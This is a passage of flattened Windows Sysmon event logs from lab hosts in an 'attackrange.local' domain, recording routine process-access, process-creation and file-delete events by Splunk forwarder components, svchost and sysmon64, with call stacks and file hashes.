Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981565Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:25.701{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8E05-6151-227A-00000000FD01}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981564Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:25.670{69CF5F33-8E05-6151-227A-00000000FD01}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001057095Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:25.108{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3FEA4244D5E437AB083785FFB41FF743,SHA256=13B0BEB78C904A4AC50413413DB95E2236F8910316448FBE5C0181D4D1FAB8AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057099Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:26.324{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7718F903D78121B3429B2D3F76BF783B,SHA256=7B8F81434139B992B7F6BC7028756509F26B531311800462BC7038414D66F951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981607Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.919{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8E06-6151-247A-00000000FD01}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981606Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.919{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981605Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.919{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981604Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.919{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981603Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.919{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981602Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.919{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981601Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.919{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981600Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.919{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981599Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.919{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981598Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.919{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981597Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.919{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8E06-6151-247A-00000000FD01}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981596Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.919{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8E06-6151-247A-00000000FD01}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981595Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.905{69CF5F33-8E06-6151-247A-00000000FD01}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000981594Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.669{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1BE43F783F024A14C5BAC6AF698D7327,SHA256=0650E743FEFD6B3833AC3407B200FD5C145D1E172E9B88EE819605622403FD00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981593Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.669{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=501BF2975EA0D1101260A8C6BBE0630A,SHA256=CA7148B70B3B99AFF1B83A938682E72825AD985259C375505D9612350069E14C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981592Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.466{69CF5F33-8E06-6151-237A-00000000FD01}8201372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981591Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.294{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8E06-6151-237A-00000000FD01}820C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981590Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.294{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981589Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.294{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981588Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.294{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981587Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.294{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981586Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.294{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981585Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.294{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981584Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.294{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|